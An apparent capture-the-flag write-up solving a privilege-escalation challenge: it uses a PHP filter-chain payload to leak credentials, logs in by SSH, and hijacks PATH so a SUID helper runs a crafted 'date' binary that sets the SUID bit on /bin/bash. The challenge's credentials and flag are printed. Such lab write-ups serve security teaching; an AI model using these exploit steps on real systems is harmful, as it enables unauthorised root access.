AUCHALL - [Privesc] - Intro Patched Privesc
Challenge Description
Based on the credentials you got from intro-patched, it's time you escalate your privileges.
Solution
On running the following payload in Intro Patched Web challenge we got credentials
git clone https://github.com/synacktiv/php_filter_chain_generator.git
python3 php_filter_chain_generator.py --chain '<?php system("env"); ?> '
On using the output of last command
Credentials
Username: vancejoy
Password: p0sty_g0a73d
Using those credentials
ssh [email protected] -p PORT
First thing is to run sudo -l
Then we would check for suid binaries
find / -perm /4000 2>/dev/null
In /opt
with helper
binary I got its source code in src.c
file
#include <stdio.h>
#include <unistd.h>
int main(int argc, char* argv[]) {
setuid(0);
setgid(0);
printf("I have a simple program that can do the following: ");
printf("1. Show the current time\n");
printf("2. Show the current date\n");
printf("What would you like to do? (1 or 2): ");
int choice;
scanf("%d", &choice);
if (choice == 1) {
system("/usr/bin/date +%T");
} else if (choice == 2) {
system("/usr/bin/date +%D");
} else if(choice == 3) {
printf("Running date...");
system("date");
} else {
printf("Invalid choice!\n");
}
}
Strategy
Our input is not directly used in those commands
Option 3 looks interesting and also there is no absolute path like /usr/bin/date
.
It is only date
. So, first thing which I would do is that I would abuse path environment variable to add other directory before any path and then I would craft my own binary with same name date
in that directory which would set suid bit in /bin/bash
. Then again run the program and select option 3 to run that binary and that would set suid bit on /bin/bash
and I would get root
For directory I would select
/tmp
Set PATH variable
$ export PATH=/tmp:$PATH
Now our path is set. Lets craft binary
Make a file in /tmp/date.c
#include<unistd.h>
void main()
{
setuid(0);
setgid(0);
system("chmod u+s /bin/bash");
}
Compile C program using following command
gcc date.c -o date
Flag
Flag is dynamic
CY243L{env_0ver11de_eA7bFf5E_bcR8_wau2}
Writeups 2023 © RootxRAN.